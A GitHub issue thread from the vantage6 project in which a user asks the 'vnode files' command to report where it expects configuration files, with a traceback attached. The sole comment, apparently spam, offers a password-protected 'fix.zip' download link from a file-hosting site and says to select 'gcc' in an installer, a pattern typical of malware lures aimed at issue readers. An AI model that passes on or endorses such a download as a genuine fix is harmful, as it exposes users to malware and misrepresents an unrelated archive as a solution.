### ISSUE TITLE
[Change Request] vnode files to report the directory where it expects config files if they are missing

### ISSUE THREAD

**Issue by harmbuisman** [vantage6/vantage6#1456]
If there are no configuration files I expect vnode files to provide me with the directory where to put them. Now instead it gives me an error, see below. The reason why is since I have a config file from another machine, which I want to copy, but I have no idea where

```
Traceback (most recent call last):
  File "/home/xyz/.local/bin/vnode", line 8, in <module>
    sys.exit(cli_node())
  File "/home/xyz/.local/lib/python3.10/site-packages/click/core.py", line 1130, in __call__
    return self.main(*args, **kwargs)
  File "/home/xyz/.local/lib/python3.10/site-packages/click/core.py", line 1055, in main
    rv = self.invoke(ctx)
  File "/home/xyz/.local/lib/python3.10/site-packages/click/core.py", line 1657, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/home/xyz/.local/lib/python3.10/site-packages/click/core.py", line 1404, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/home/xyz/.local/lib/python3.10/site-packages/click/core.py", line 760, in invoke
    return __callback(*args, **kwargs)
  File "/home/xyz/.local/lib/python3.10/site-packages/vantage6/cli/node/files.py", line 31, in cli_node_files
    name = select_node(name, system_folders)
  File "/home/xyz/.local/lib/python3.10/site-packages/vantage6/cli/node/common/__init__.py", line 83, in select_node
    else select_configuration_questionaire(InstanceType.NODE, system_folders)
  File "/home/xyz/.local/lib/python3.10/site-packages/vantage6/cli/configuration_wizard.py", line 612, in select_configuration_questiona
ire
    raise Exception("No configurations could be found!")
Exception: No configurations could be found!
```

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
